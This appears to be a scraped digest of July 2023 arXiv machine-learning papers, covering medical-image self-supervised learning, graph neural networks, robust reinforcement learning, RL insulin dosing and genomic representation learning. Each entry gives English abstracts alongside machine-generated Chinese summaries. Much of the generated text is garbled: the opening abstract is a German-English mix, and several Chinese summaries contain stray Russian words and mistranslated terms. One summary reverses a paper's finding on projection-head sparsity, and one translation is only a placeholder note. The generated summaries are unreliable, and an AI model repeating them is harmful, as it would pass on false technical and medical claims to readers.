für viele Anwendungen von Klassifikatoren auf medizinische Bilder kann ein zuverlässiger Label für jede Bilddatei schwierig oder teuer zu beschaffen sein. Im Gegensatz dazu sind Bilder ohne Labels mehr verfügbar. Zwei wichtige Forschungsrichtungen versprechen, dass zusätzliches unetikettiertes Datenmaterial die Leistung des Klassifikators verbessern kann: Selbstübergreifendes Lernen trainiert nützliche Representationen auf unetikettiertem Datenmaterial, then fine-tunes a classifier via the labeled set; semi-supervised Learning trainiert direkt einen Klassifikator auf etikettierten und unetikettierten Daten gleichzeitig. Recente Methoden beider Richtungen haben bedeutende Fortschritte bei nicht-medizinischen Aufgaben erzielt, aber systematisch die medizinischen Bilder nicht bewertet und sich nur mit Methoden in derselben Richtungen verglichen. This study contributes a carefully-designed Benchmark, um zu antworten auf eine wichtige Frage des Practitioners: given a small labeled dataset and a limited budget of hours to spend on training, what gains from additional unetikettiertes images are possible and which methods best achieve them? Im Gegensatz zu previous Benchmarks, ours uses realistic-sized validation sets to select hyperparameters, assesses runtime-performance tradeoffs, and bridges two research fields. By comparing 6 semi-supervised methods and 5 self-supervised methods to strong labeled-only baselines on 3 medical datasets with 30-1000 labels per class, we offer insights to resource-constrained, results-focused practitioners: MixMatch, SimCLR, and BYOL represent strong choices that were not surpassed by more recent methods. After much effort selecting hyperparameters on one dataset, we publish settings that enable strong methods to perform well on new medical tasks within a few hours, with further search over dozens of hours delivering modest additional gains.

Towards the Sparseness of Projection Head in Self-Supervised Learning

paper_url: http://arxiv.org/abs/2307.08913
repo_url: None
paper_authors: Zeen Song, Xingzhe Su, Jingyao Wang, Wenwen Qiang, Changwen Zheng, Fuchun Sun
for: 提高自动学习（SSL）方法中的表示性能
methods: 使用对偶学习方法和理论分析，探讨投影头部件的内部机制和维度归一化现象之间的关系
results: 提出了一种假设，即只需要在数据批处理中最小化对偶损失时使用一部分特征；并通过对SSL方法进行论证，提出了一种名为SparseHead的规范项，可以减少投影头部件的稀疏性，从而提高SSL方法的表示性能。

Abstract
In recent years, self-supervised learning (SSL) has emerged as a promising approach for extracting valuable representations from unlabeled data. One successful SSL method is contrastive learning, which aims to bring positive examples closer while pushing negative examples apart. Many current contrastive learning approaches utilize a parameterized projection head. Through a combination of empirical analysis and theoretical investigation, we provide insights into the internal mechanisms of the projection head and its relationship with the phenomenon of dimensional collapse. Our findings demonstrate that the projection head enhances the quality of representations by performing contrastive loss in a projected subspace. Therefore, we propose an assumption that only a subset of features is necessary when minimizing the contrastive loss of a mini-batch of data. Theoretical analysis further suggests that a sparse projection head can enhance generalization, leading us to introduce SparseHead - a regularization term that effectively constrains the sparsity of the projection head, and can be seamlessly integrated with any self-supervised learning (SSL) approaches. Our experimental results validate the effectiveness of SparseHead, demonstrating its ability to improve the performance of existing contrastive methods.

摘要
Note: The text has been translated into Simplified Chinese, which is the standard form of Chinese used in mainland China and Singapore.

Sharpness-Aware Graph Collaborative Filtering

paper_url: http://arxiv.org/abs/2307.08910
repo_url: None
paper_authors: Huiyuan Chen, Chin-Chia Michael Yeh, Yujie Fan, Yan Zheng, Junpeng Wang, Vivian Lai, Mahashweta Das, Hao Yang
for: 提高Graph Neural Networks（GNNs）在协同缓存中的表现。
methods: 提出了一种有效的训练方案{gSAM}，基于权重损失 landscape的平滑性来优化GNNs。
results: 实验结果表明，gSAM可以提高GNNs的表现。

Abstract
Graph Neural Networks (GNNs) have achieved impressive performance in collaborative filtering. However, GNNs tend to yield inferior performance when the distributions of training and test data are not aligned well. Also, training GNNs requires optimizing non-convex neural networks with an abundance of local and global minima, which may differ widely in their performance at test time. Thus, it is essential to choose the minima carefully. Here we propose an effective training schema, called {gSAM}, under the principle that the \textit{flatter} minima has a better generalization ability than the \textit{sharper} ones. To achieve this goal, gSAM regularizes the flatness of the weight loss landscape by forming a bi-level optimization: the outer problem conducts the standard model training while the inner problem helps the model jump out of the sharp minima. Experimental results show the superiority of our gSAM.

摘要
格raph神经网络（GNNs）在共同推荐中表现出色。然而，GNNs在训练和测试数据分布不匹配时表现不佳。此外，训练GNNs需要优化非核心积分神经网络，这些神经网络具有很多的本地和全局最小值，其测试时表现可能很不同。因此，选择最佳的最小值非常重要。我们提出了一种有效的训练方法，即{gSAM}，其基于“稍平”的最小值具有更好的泛化能力。为实现这个目标，gSAM在权重损失的折衔减中做出了二级优化：外部问题进行标准模型训练，而内部问题帮助模型离开锋利的最小值。实验结果显示了我们的gSAM的优越性。

Solving multiphysics-based inverse problems with learned surrogates and constraints

paper_url: http://arxiv.org/abs/2307.11099
repo_url: None
paper_authors: Ziyi Yin, Rafael Orozco, Mathias Louboutin, Felix J. Herrmann
for: 这 paper 是用于解决地质碳存储监测中的多物理 inverse problem 的。
methods: 这 paper 使用了 computationally cheap 的 learned surrogates 和 learned constraints 来解决这些问题。
results: 这 paper 的结果表明，这种 combinaison 可以提高 fluid-flow 性能的减法，并且可以处理多模态数据，包括 well 测量和 active-source time-lapse seismic 数据。另外，这种方法还可以保持准确性，因为它使用了一个 trained deep neural network 来 constrain the model iterates。

Abstract
Solving multiphysics-based inverse problems for geological carbon storage monitoring can be challenging when multimodal time-lapse data are expensive to collect and costly to simulate numerically. We overcome these challenges by combining computationally cheap learned surrogates with learned constraints. Not only does this combination lead to vastly improved inversions for the important fluid-flow property, permeability, it also provides a natural platform for inverting multimodal data including well measurements and active-source time-lapse seismic data. By adding a learned constraint, we arrive at a computationally feasible inversion approach that remains accurate. This is accomplished by including a trained deep neural network, known as a normalizing flow, which forces the model iterates to remain in-distribution, thereby safeguarding the accuracy of trained Fourier neural operators that act as surrogates for the computationally expensive multiphase flow simulations involving partial differential equation solves. By means of carefully selected experiments, centered around the problem of geological carbon storage, we demonstrate the efficacy of the proposed constrained optimization method on two different data modalities, namely time-lapse well and time-lapse seismic data. While permeability inversions from both these two modalities have their pluses and minuses, their joint inversion benefits from either, yielding valuable superior permeability inversions and CO2 plume predictions near, and far away, from the monitoring wells.

摘要
解决基于多物理学的逆 пробле 的地质碳存储监测可以是困难的，当 multimodal 时间差数据成本高昂， numerically 计算成本高昂时。我们利用计算成本低廉的学习的代理人与学习的约束结合，不仅能够大幅提高流体流动性的重要性质，孔隙性，还提供了自然的多模态数据逆向平台。通过添加学习的约束，我们实现了计算可行的逆向方法，保持精度。这是通过包含训练好的深度神经网络，即 нормализа流，使模型迭代器 remains 在distribution中，保证训练了Fourier神经网络作为多相流 simulations involving partial differential equation solves的计算昂贵的surrogate。通过选择精心的实验，以地质碳存储问题为中心，我们在时间差井和时间差地震数据两个不同的模式下展示了提案的受限优化方法的效果。虽然孔隙性逆向从这两个模式中有其优缺点，但是两者的共同逆向具有优势，为CO2泵预测和碳存储监测提供了有价值的Superior permeability inversions和预测。

Basal-Bolus Advisor for Type 1 Diabetes (T1D) Patients Using Multi-Agent Reinforcement Learning (RL) Methodology

paper_url: http://arxiv.org/abs/2307.08897
repo_url: None
paper_authors: Mehrad Jaloli, Marzia Cescon
for: 这种研究旨在开发一种基于多智能 reinforcement learning（RL）的个性化血糖控制方法，以改善ype 1 диабе尼（T1D）患者的血糖控制。
methods: 该方法使用一个关闭的循环系统，包括血糖代谢模型和多智能软actor-critic RL模型，作为基础-膳食帮手。
results: 研究结果表明，RL-基于的基础-膳食帮手可以有效改善血糖控制，降低血糖波动性，并增加血糖水平在目标范围内的时间。同时，RL方法可以有效预防低血糖事件，并减少高血糖事件。此外，RL方法还导致了对 convential 疗法相比，每天基础荷尔血糖剂的减少。这些发现表明RL方法可以在ype 1 диабе尼患者中实现更好的血糖控制，并减少严重高血糖的风险。

Abstract
This paper presents a novel multi-agent reinforcement learning (RL) approach for personalized glucose control in individuals with type 1 diabetes (T1D). The method employs a closed-loop system consisting of a blood glucose (BG) metabolic model and a multi-agent soft actor-critic RL model acting as the basal-bolus advisor. Performance evaluation is conducted in three scenarios, comparing the RL agents to conventional therapy. Evaluation metrics include glucose levels (minimum, maximum, and mean), time spent in different BG ranges, and average daily bolus and basal insulin dosages. Results demonstrate that the RL-based basal-bolus advisor significantly improves glucose control, reducing glycemic variability and increasing time spent within the target range (70-180 mg/dL). Hypoglycemia events are effectively prevented, and severe hyperglycemia events are reduced. The RL approach also leads to a statistically significant reduction in average daily basal insulin dosage compared to conventional therapy. These findings highlight the effectiveness of the multi-agent RL approach in achieving better glucose control and mitigating the risk of severe hyperglycemia in individuals with T1D.

摘要

Evaluating unsupervised disentangled representation learning for genomic discovery and disease risk prediction

paper_url: http://arxiv.org/abs/2307.08893
repo_url: None
paper_authors: Taedong Yun
for: 这个论文主要是为了研究高维клиниче数据中的生物marks，以及使用深度学习技术进行遗传学研究。
methods: 这个论文使用了多种无监督学习方法，包括自动编码器、VAE、β-VAE和factorVAE，以学习分离的表示。
results: 研究发现，使用FactorVAE或β-VAE，可以提高遗传学研究中的结果，包括基因associes数量、heritability和多ifactorial风险分数的性能。factorVAE在不同的规则化参数值下表现良好，而β-VAE却受到规则化参数值的影响较大。

Abstract
High-dimensional clinical data have become invaluable resources for genetic studies, due to their accessibility in biobank-scale datasets and the development of high performance modeling techniques especially using deep learning. Recent work has shown that low dimensional embeddings of these clinical data learned by variational autoencoders (VAE) can be used for genome-wide association studies and polygenic risk prediction. In this work, we consider multiple unsupervised learning methods for learning disentangled representations, namely autoencoders, VAE, beta-VAE, and FactorVAE, in the context of genetic association studies. Using spirograms from UK Biobank as a running example, we observed improvements in the number of genome-wide significant loci, heritability, and performance of polygenic risk scores for asthma and chronic obstructive pulmonary disease by using FactorVAE or beta-VAE, compared to standard VAE or non-variational autoencoders. FactorVAEs performed effectively across multiple values of the regularization hyperparameter, while beta-VAEs were much more sensitive to the hyperparameter values.

摘要
高维临床数据已成为生物银行规模数据集的不可或缺的资源，这主要归功于生物银行规模数据集的可用性和深度学习技术的发展。据研究表明，使用变量自动编码器（VAE）学习的低维度表示可以用于遗传相关研究和多ifactorial风险预测。在本工作中，我们考虑了多种无监督学习方法，包括 autoencoder、VAE、β-VAE 和 FactorVAE，在遗传相关研究中。使用 UK Biobank 的呼吸图为例，我们发现了使用 FactorVAE 或 β-VAE 而非标准 VAE 或非变量自动编码器后，对气喘病和肺部疾病的遗传相关性、heritability 和多ifactorial风险分数的改进。FactorVAE 在多个规则化超参数值上表现得更好，而 β-VAE 对超参数值的敏感性较高。

The Predicted-Deletion Dynamic Model: Taking Advantage of ML Predictions, for Free

paper_url: http://arxiv.org/abs/2307.08890
repo_url: None
paper_authors: Quanquan C. Liu, Vaidehi Srinivas
for: 这 paper 的目的是解决动态图中edge更新预测问题，提高动态算法的效率。
methods: 这 paper 使用了预测 deleting 的 Dynamic Model，并提出了一种基于这种模型的框架，可以将部分动态算法”升级”到完全动态Setting中，减少了更新时间的复杂性。
results: 这 paper 的算法在不同的问题上都能够实现更好的性能，具体来说，它们的平均更新时间与部分动态算法相似，而且在预测质量较高时，它们的性能与完全动态算法相当。

Abstract
The main bottleneck in designing efficient dynamic algorithms is the unknown nature of the update sequence. In particular, there are some problems, like 3-vertex connectivity, planar digraph all pairs shortest paths, and others, where the separation in runtime between the best partially dynamic solutions and the best fully dynamic solutions is polynomial, sometimes even exponential. In this paper, we formulate the predicted-deletion dynamic model, motivated by a recent line of empirical work about predicting edge updates in dynamic graphs. In this model, edges are inserted and deleted online, and when an edge is inserted, it is accompanied by a "prediction" of its deletion time. This models real world settings where services may have access to historical data or other information about an input and can subsequently use such information make predictions about user behavior. The model is also of theoretical interest, as it interpolates between the partially dynamic and fully dynamic settings, and provides a natural extension of the algorithms with predictions paradigm to the dynamic setting. We give a novel framework for this model that "lifts" partially dynamic algorithms into the fully dynamic setting with little overhead. We use our framework to obtain improved efficiency bounds over the state-of-the-art dynamic algorithms for a variety of problems. In particular, we design algorithms that have amortized update time that scales with a partially dynamic algorithm, with high probability, when the predictions are of high quality. On the flip side, our algorithms do no worse than existing fully-dynamic algorithms when the predictions are of low quality. Furthermore, our algorithms exhibit a graceful trade-off between the two cases. Thus, we are able to take advantage of ML predictions asymptotically "for free.''

摘要
主要瓶颈在设计高效的动态算法上是未知的更新序列。特别是有些问题，如3个顶点连接性、平面图全对短路和其他问题，其运行时间差 между最佳半动态解决方案和最佳完全动态解决方案是多项式，有时甚至是指数。在这篇论文中，我们提出预测删除动态模型，因为一些现实世界中的服务可以通过历史数据或其他信息来预测用户行为。这种模型在理论上也很有 interess，因为它在半动态和完全动态之间进行 interpolating，并且为动态设定提供了自然的扩展。我们给出了一种新的框架，使得半动态算法在完全动态设定下具有较少的开销。我们使用这种框架，设计了一些算法，其更新时间平均与半动态算法相似，高probability 时，当预测质量高时。另一方面，我们的算法不比现有的完全动态算法差，当预测质量低时。此外，我们的算法具有温和的质量补偿，因此可以充分利用机器学习预测，“免费”。

Examining the Effects of Degree Distribution and Homophily in Graph Learning Models

paper_url: http://arxiv.org/abs/2307.08881
repo_url: https://github.com/google-research/graphworld
paper_authors: Mustafa Yasir, John Palowitch, Anton Tsitsulin, Long Tran-Thanh, Bryan Perozzi
for: This paper aims to improve the evaluation of graph neural network (GNN) models by expanding the coverage of graph space within the GraphWorld framework.
methods: The paper uses three synthetic graph generators: the Stochastic Block Model (SBM), LFR, and CABAM. These generators are integrated into the GraphWorld framework to create more diverse populations of synthetic graphs for benchmarking GNN tasks.
results: The paper generates 300,000 graphs to benchmark 11 GNN models on a node classification task, and finds variations in GNN performance in response to homophily, degree distribution, and feature signal. The paper classifies GNN models based on their sensitivity to the new generators under these properties.Here’s the simplified Chinese text for the three information points:
for: 这篇论文目标是提高图神经网络（GNN）模型的评估，通过扩展图WORLD框架中的图空间覆盖。
methods: 这篇论文使用了三种 sintetic 图生成器：Stochastic Block Model（SBM）、LFR 和 CABAM。这些生成器被 integrate 到图WORLD框架中，以创造更多的多样化的 sintetic 图来 benchmark GNN 任务。
results: 这篇论文通过生成 300,000 个图，对 11 种 GNN 模型进行节点分类任务的评估，发现 GNN 性能响应于同类性、度分布和特征信号。 paper 根据这些特性将 GNN 模型分类为敏感性。

Abstract
Despite a surge in interest in GNN development, homogeneity in benchmarking datasets still presents a fundamental issue to GNN research. GraphWorld is a recent solution which uses the Stochastic Block Model (SBM) to generate diverse populations of synthetic graphs for benchmarking any GNN task. Despite its success, the SBM imposed fundamental limitations on the kinds of graph structure GraphWorld could create. In this work we examine how two additional synthetic graph generators can improve GraphWorld's evaluation; LFR, a well-established model in the graph clustering literature and CABAM, a recent adaptation of the Barabasi-Albert model tailored for GNN benchmarking. By integrating these generators, we significantly expand the coverage of graph space within the GraphWorld framework while preserving key graph properties observed in real-world networks. To demonstrate their effectiveness, we generate 300,000 graphs to benchmark 11 GNN models on a node classification task. We find GNN performance variations in response to homophily, degree distribution and feature signal. Based on these findings, we classify models by their sensitivity to the new generators under these properties. Additionally, we release the extensions made to GraphWorld on the GitHub repository, offering further evaluation of GNN performance on new graphs.

摘要
尽管GNN发展中的兴趣增长，仍然存在基本问题，即 benchmarking 数据集的同质性。GraphWorld 是一种最近的解决方案，使用 Stochastic Block Model（SBM）生成多样化的 synthetic graph 用于任何 GNN 任务的 benchmarking。尽管它成功，但 SBM 强制性限制 GraphWorld 可以创建的图结构类型。在这种工作中，我们检查了两种额外的 sintethic graph 生成器是如何提高 GraphWorld 的评估。LFR 是一种已有的图分群模型，CABAM 是一种对 Barabasi-Albert 模型的最近适应，专门用于 GNN benchmarking。通过将这些生成器纳入 GraphWorld 框架，我们可以覆盖图空间的扩展，保持真实世界网络中观察到的关键图属性。为了证明其效果，我们生成了 300,000 个图用于对 11 种 GNN 模型进行节点分类任务的 benchmarking。我们发现 GNN 模型在同质性、度分布和特征信号下的性能变化。根据这些发现，我们将模型分为它们对新生成器下的性能响应。此外，我们在 GitHub 仓库中发布了 GraphWorld 的扩展，以便进一步评估 GNN 性能在新的图上。

Modular Neural Network Approaches for Surgical Image Recognition

paper_url: http://arxiv.org/abs/2307.08880
repo_url: None
paper_authors: Nosseiba Ben Salem, Younes Bennani, Joseph Karkazan, Abir Barbara, Charles Dacheux, Thomas Gregory
for: 这个研究是为了提出一种基于深度学习的脑网络架构，以解决现代问题的复杂化和数据不足问题。
methods: 这个研究使用了自我训练的方法来解决数据不足问题，并且将问题分解为更简单的子 задачі，以提高模型的泛化和解释性。
results: 研究发现，使用模块学习方法可以提高分类性能，并且可以实现近乎完美的分类。另外，这种方法还可以提高数据分类的速度和可解释性。

Abstract
Deep learning-based applications have seen a lot of success in recent years. Text, audio, image, and video have all been explored with great success using deep learning approaches. The use of convolutional neural networks (CNN) in computer vision, in particular, has yielded reliable results. In order to achieve these results, a large amount of data is required. However, the dataset cannot always be accessible. Moreover, annotating data can be difficult and time-consuming. Self-training is a semi-supervised approach that managed to alleviate this problem and achieve state-of-the-art performances. Theoretical analysis even proved that it may result in a better generalization than a normal classifier. Another problem neural networks can face is the increasing complexity of modern problems, requiring a high computational and storage cost. One way to mitigate this issue, a strategy that has been inspired by human cognition known as modular learning, can be employed. The principle of the approach is to decompose a complex problem into simpler sub-tasks. This approach has several advantages, including faster learning, better generalization, and enables interpretability. In the first part of this paper, we introduce and evaluate different architectures of modular learning for Dorsal Capsulo-Scapholunate Septum (DCSS) instability classification. Our experiments have shown that modular learning improves performances compared to non-modular systems. Moreover, we found that weighted modular, that is to weight the output using the probabilities from the gating module, achieved an almost perfect classification. In the second part, we present our approach for data labeling and segmentation with self-training applied on shoulder arthroscopy images.

摘要
深度学习基于应用在过去几年中取得了很多成功。文本、音频、图像和视频都被使用深度学习方法进行了成功的探索。特别是在计算机视觉方面，卷积神经网络（CNN）的使用已经取得了可靠的结果。但是，获取数据的问题仍然存在。另外，标注数据可能会是困难的和耗时的。自学习是一种半监督学习方法，可以解决这个问题，并达到状态艺术的性能。理论分析还证明，它可能会在普通分类器之上取得更好的泛化性。另一个问题是现代问题的复杂性，需要高度的计算和存储成本。一种可以 mitigate这个问题的方法是模块学习。这种方法的原理是将复杂问题分解成更简单的子任务。这种方法有很多优点，包括更快的学习、更好的泛化和可读性。在本文的第一部分，我们介绍了不同的模块学习架构，并对DCSS不稳定性分类问题进行了评估。我们的实验结果表明，模块学习可以提高性能，而且使用权重模块可以达到几乎完美的分类。在第二部分，我们介绍了我们的自动标注和分割方法，使用自学习在肩镜像中进行了应用。

Disentangling Node Attributes from Graph Topology for Improved Generalizability in Link Prediction

paper_url: http://arxiv.org/abs/2307.08877
repo_url: https://github.com/chatterjeeayan/upna
paper_authors: Ayan Chatterjee, Robin Walters, Giulia Menichetti, Tina Eliassi-Rad
for: 链接预测是图机器学习中关键的任务，具有广泛的应用。本文研究节点特征和图结构之间的互动，并证明在包含预训节点特征的情况下，链接预测模型的泛化能力得到提高。
methods: 我们提出的方法是UPNA（无监督节点特征预训），它解决了链接预测问题，学习一个函数，将两个节点特征作为输入，预测两节点之间的边的概率。与传统的图神经网络（GNN）不同，UPNA不会因为图中强制度分布的问题而陷入拟合偏见。
results: 我们的实验表明，UPNA可以在多种对比 datasets 上达到3X至34X的提高，超过当前的状态艺。此外，UPNA可以应用于多种对比学习任务，并与现有的链接预测模型集成，提高其泛化能力和图生成模型的强度。

Abstract
Link prediction is a crucial task in graph machine learning with diverse applications. We explore the interplay between node attributes and graph topology and demonstrate that incorporating pre-trained node attributes improves the generalization power of link prediction models. Our proposed method, UPNA (Unsupervised Pre-training of Node Attributes), solves the inductive link prediction problem by learning a function that takes a pair of node attributes and predicts the probability of an edge, as opposed to Graph Neural Networks (GNN), which can be prone to topological shortcuts in graphs with power-law degree distribution. In this manner, UPNA learns a significant part of the latent graph generation mechanism since the learned function can be used to add incoming nodes to a growing graph. By leveraging pre-trained node attributes, we overcome observational bias and make meaningful predictions about unobserved nodes, surpassing state-of-the-art performance (3X to 34X improvement on benchmark datasets). UPNA can be applied to various pairwise learning tasks and integrated with existing link prediction models to enhance their generalizability and bolster graph generative models.

摘要
链接预测是图机器学习中关键的任务，具有广泛的应用。我们研究节点特征和图结构之间的互动，并证明在把预训练节点特征纳入模型中可以提高链接预测模型的通用能力。我们提出的方法是UPNA（无监督节点特征预训练），解决了链接预测问题，学习一个函数，用来预测两个节点之间的边的概率，而不是使用图神经网络（GNN），后者可能会因为图中具有强制的度分布而导致拓扑短 Circuit。这种方法可以学习图生成机制的一个重要部分，因为学习的函数可以用来添加新的入节点到生长中的图。通过利用预训练节点特征，我们超越观察偏见，可以对未观察的节点进行有意义的预测，超过了状态艺术性的表现（3X-34X提高在标准数据集上）。UPNA可以应用于多种对称学习任务，并可以与现有的链接预测模型集成，提高其通用性和图生成模型的鲁棒性。

Natural Actor-Critic for Robust Reinforcement Learning with Function Approximation

paper_url: http://arxiv.org/abs/2307.08875
repo_url: None
paper_authors: Ruida Zhou, Tao Liu, Min Cheng, Dileep Kalathil, P. R. Kumar, Chao Tian
for: 这个论文的目的是解决模型匹配问题，即在训练环境和测试环境之间的模型差异问题，以确定一个可靠性高的策略。
methods: 该论文提出了两种新的不确定集形式，一种基于双抽样，另一种基于积分概率度量。这两种不确定集形式使得大规模的Robust reinforcement learning（RL）变得可 tractable，即使只有训练环境。该论文还提出了一种 robust natural actor-critic（RNAC）方法，该方法包括新的不确定集形式和函数approximation。
results: 该论文的实验结果显示，RNAC方法可以在多个 MuJoCo 环境和一个实际世界的TurtleBot导航任务中提供良好的Robust性性能。

Abstract
We study robust reinforcement learning (RL) with the goal of determining a well-performing policy that is robust against model mismatch between the training simulator and the testing environment. Previous policy-based robust RL algorithms mainly focus on the tabular setting under uncertainty sets that facilitate robust policy evaluation, but are no longer tractable when the number of states scales up. To this end, we propose two novel uncertainty set formulations, one based on double sampling and the other on an integral probability metric. Both make large-scale robust RL tractable even when one only has access to a simulator. We propose a robust natural actor-critic (RNAC) approach that incorporates the new uncertainty sets and employs function approximation. We provide finite-time convergence guarantees for the proposed RNAC algorithm to the optimal robust policy within the function approximation error. Finally, we demonstrate the robust performance of the policy learned by our proposed RNAC approach in multiple MuJoCo environments and a real-world TurtleBot navigation task.

摘要
我们研究了一种robust reinforcement learning（RL）方法，以确定在训练环境和测试环境之间存在模型匹配不良的情况下，可以达到良好的策略。之前的策略基于RL算法主要在表格设定下进行了不确定性集的使用，但是当状态数量增加时，这些算法就不再可行了。为此，我们提出了两种新的不确定性集形式，一种基于双抽样，另一种基于 интеграル概率度量。这两种形式使得大规模的RL问题变得可 tractable，即使只有训练环境的模型。我们提出了一种robust natural actor-critic（RNAC）方法，该方法包括新的不确定性集和函数近似。我们提供了finite-time converges guarantees，表明RNAC算法在函数近似误差下可以在有限时间内 converges到最佳robust策略。最后，我们在多个MuJoCo环境和一个实际世界TurtleBot导航任务中证明了我们提出的RNAC策略的robust性。

Latent Space Representations of Neural Algorithmic Reasoners

paper_url: http://arxiv.org/abs/2307.08874
repo_url: https://github.com/mirjanic/nar-latent-spaces
paper_authors: Vladimir V. Mirjanić, Razvan Pascanu, Petar Veličković
for: 这个研究探讨了神经算法逻辑（NAR）领域中使用神经网络架构来可靠地捕捉经典计算方法的问题。
methods: 该研究使用图神经网络（GNN）架构，将输入编码成高维隐藏空间，并在执行算法时进行重复转换。
results: 研究发现GNN架构中的隐藏空间结构存在两种可能的失败模式：（1）loss of resolution，导致同样的值很难分辨；（2）无法处理训练期间未见到的值。提议使用softmax汇聚器和衰减隐藏空间来解决这两种问题，并证明这些改进可以在CLRS-30标准测试集上提高大多数算法的性能。

Abstract
Neural Algorithmic Reasoning (NAR) is a research area focused on designing neural architectures that can reliably capture classical computation, usually by learning to execute algorithms. A typical approach is to rely on Graph Neural Network (GNN) architectures, which encode inputs in high-dimensional latent spaces that are repeatedly transformed during the execution of the algorithm. In this work we perform a detailed analysis of the structure of the latent space induced by the GNN when executing algorithms. We identify two possible failure modes: (i) loss of resolution, making it hard to distinguish similar values; (ii) inability to deal with values outside the range observed during training. We propose to solve the first issue by relying on a softmax aggregator, and propose to decay the latent space in order to deal with out-of-range values. We show that these changes lead to improvements on the majority of algorithms in the standard CLRS-30 benchmark when using the state-of-the-art Triplet-GMPNN processor. Our code is available at \href{https://github.com/mirjanic/nar-latent-spaces}{https://github.com/mirjanic/nar-latent-spaces}.

摘要

An Alternative to Variance: Gini Deviation for Risk-averse Policy Gradient

paper_url: http://arxiv.org/abs/2307.08873
repo_url: None
paper_authors: Yudong Luo, Guiliang Liu, Pascal Poupart, Yangchen Pan
for: 降低奖励学习中的风险偏好，即使是在数值上有些偏好。
methods: 使用新的风险度量——吉尼偏度，代替传统的归一化奖励方法。
results: 在具有明确的风险偏好的领域中，通过对吉尼偏度进行优化，实现高回报低风险的策略学习。其他方法在这些领域中很难学习一个合理的策略。

Abstract
Restricting the variance of a policy's return is a popular choice in risk-averse Reinforcement Learning (RL) due to its clear mathematical definition and easy interpretability. Traditional methods directly restrict the total return variance. Recent methods restrict the per-step reward variance as a proxy. We thoroughly examine the limitations of these variance-based methods, such as sensitivity to numerical scale and hindering of policy learning, and propose to use an alternative risk measure, Gini deviation, as a substitute. We study various properties of this new risk measure and derive a policy gradient algorithm to minimize it. Empirical evaluation in domains where risk-aversion can be clearly defined, shows that our algorithm can mitigate the limitations of variance-based risk measures and achieves high return with low risk in terms of variance and Gini deviation when others fail to learn a reasonable policy.

摘要
限制策略回报的方差是现代学习控制（RL）中的一个受欢迎选择，因为它的数学定义具有明确的定义和易于理解的解释。传统方法直接限制总返回方差。最近的方法则限制每步奖励方差作为代理。我们详细检查了这些方差基于的方法的局限性，如数字化缩放的感度和策略学习妨碍，并提出一种新的风险度量，即吉尼度偏离，作为替代。我们研究了这种新的风险度量的多种性质，并 derivation 一种策略梯度算法来最小化它。实验表明，当其他策略不能学习合理的策略时，我们的算法可以减轻方差基于的风险度量的局限性，并在 variance 和吉尼度偏离方面实现高回报低风险。

Meta-Value Learning: a General Framework for Learning with Learning Awareness

paper_url: http://arxiv.org/abs/2307.08863
repo_url: https://github.com/metavaluelearning/metavaluelearning
paper_authors: Tim Cooijmans, Milad Aghajohari, Aaron Courville
For: 本 paper 的目的是解决多体系统中的梯度学习问题，因为梯度来自于一个第一个模型，这个模型不会考虑多体间学习过程的交互。* Methods: 本 paper extend了 LOLA 的想法，开发了一种全面的值基定义优化方法。这种方法的核心是一个我们称为元价值函数，它在每个 JOINT-policy 空间中为每个代理给出一个折抵负号的优化目标。我们 argue 这个梯度比原始目标更可靠，因为元价值函数来自于优化过程中的实际观察。* Results: 我们通过对 Logistic Game 和 Iterated Prisoner’s Dilemma 两个问题进行分析，显示了我们的方法的行为。

Abstract
Gradient-based learning in multi-agent systems is difficult because the gradient derives from a first-order model which does not account for the interaction between agents' learning processes. LOLA (arXiv:1709.04326) accounts for this by differentiating through one step of optimization. We extend the ideas of LOLA and develop a fully-general value-based approach to optimization. At the core is a function we call the meta-value, which at each point in joint-policy space gives for each agent a discounted sum of its objective over future optimization steps. We argue that the gradient of the meta-value gives a more reliable improvement direction than the gradient of the original objective, because the meta-value derives from empirical observations of the effects of optimization. We show how the meta-value can be approximated by training a neural network to minimize TD error along optimization trajectories in which agents follow the gradient of the meta-value. We analyze the behavior of our method on the Logistic Game and on the Iterated Prisoner's Dilemma.

摘要
gradient-based learning in multi-agent systems 困难，因为梯度来自于一个第一阶模型，这个模型不考虑多个代理机器学习过程之间的互动。LOLA（arXiv:1709.04326）提出了一种解决方案，通过一步优化差分。我们在LOLA的基础上发展了一种完全普遍的价值基于方法，其核心是一个我们称为“元价值”的函数，每个代理机器在联合策略空间中的每个点处给每个代理机器一个折扣的未来优化步骤中的目标减少和。我们 argue that the gradient of the meta-value gives a more reliable improvement direction than the gradient of the original objective, because the meta-value derives from empirical observations of the effects of optimization. We show how the meta-value can be approximated by training a neural network to minimize TD error along optimization trajectories in which agents follow the gradient of the meta-value。我们分析了我们的方法在Logistic Game和Iterated Prisoner's Dilemma中的行为。

Curriculum Learning for Graph Neural Networks: A Multiview Competence-based Approach

paper_url: http://arxiv.org/abs/2307.08859
repo_url: https://github.com/CLU-UML/MCCL
paper_authors: Nidhi Vakil, Hadi Amiri
for: 本研究旨在提出一种基于图复杂度形式和模型能力的新方法，以便在图神经网络训练中进行有效的课程学习。
methods: 该方法使用了一种调度方案，以确定有效的课程，并考虑了不同的图Difficulty标准和模型能力 durante el entrenamiento。
results: 实验结果表明，该方法可以在真实世界的链接预测和节点分类任务中提供更高的效果，比如使用多个图Difficulty标准和模型能力来评估模型的性能。

Abstract
A curriculum is a planned sequence of learning materials and an effective one can make learning efficient and effective for both humans and machines. Recent studies developed effective data-driven curriculum learning approaches for training graph neural networks in language applications. However, existing curriculum learning approaches often employ a single criterion of difficulty in their training paradigms. In this paper, we propose a new perspective on curriculum learning by introducing a novel approach that builds on graph complexity formalisms (as difficulty criteria) and model competence during training. The model consists of a scheduling scheme which derives effective curricula by accounting for different views of sample difficulty and model competence during training. The proposed solution advances existing research in curriculum learning for graph neural networks with the ability to incorporate a fine-grained spectrum of graph difficulty criteria in their training paradigms. Experimental results on real-world link prediction and node classification tasks illustrate the effectiveness of the proposed approach.

摘要
一个课程是一个规划的学习材料序列，一个有效的课程可以使学习变得更加效率和有效。现代研究已经开发出了训练图型神经网络的数据驱动课程学习方法。然而，现有的课程学习方法通常使用单一的难度标准来训练。在这篇论文中，我们提出了一个新的观点，即基于图型复杂性形式（难度标准）和模型能力的课程学习方法。我们的方法包括一个时间表，它可以从训练中的不同角度来评估题目难度和模型能力，并从中 derivate 有效的课程。我们的解决方案超越了现有的课程学习研究，可以将图型难度标准细分为训练中的不同角度。实验结果显示，我们的方法在实际的连接预测和节点分类任务中具有优秀的效果。

An Admissible Shift-Consistent Method for Recommender Systems

paper_url: http://arxiv.org/abs/2307.08857
repo_url: None
paper_authors: Tung Nguyen, Jeffrey Uhlmann
for: solves matrix/tensor completion problems in the context of recommender systems
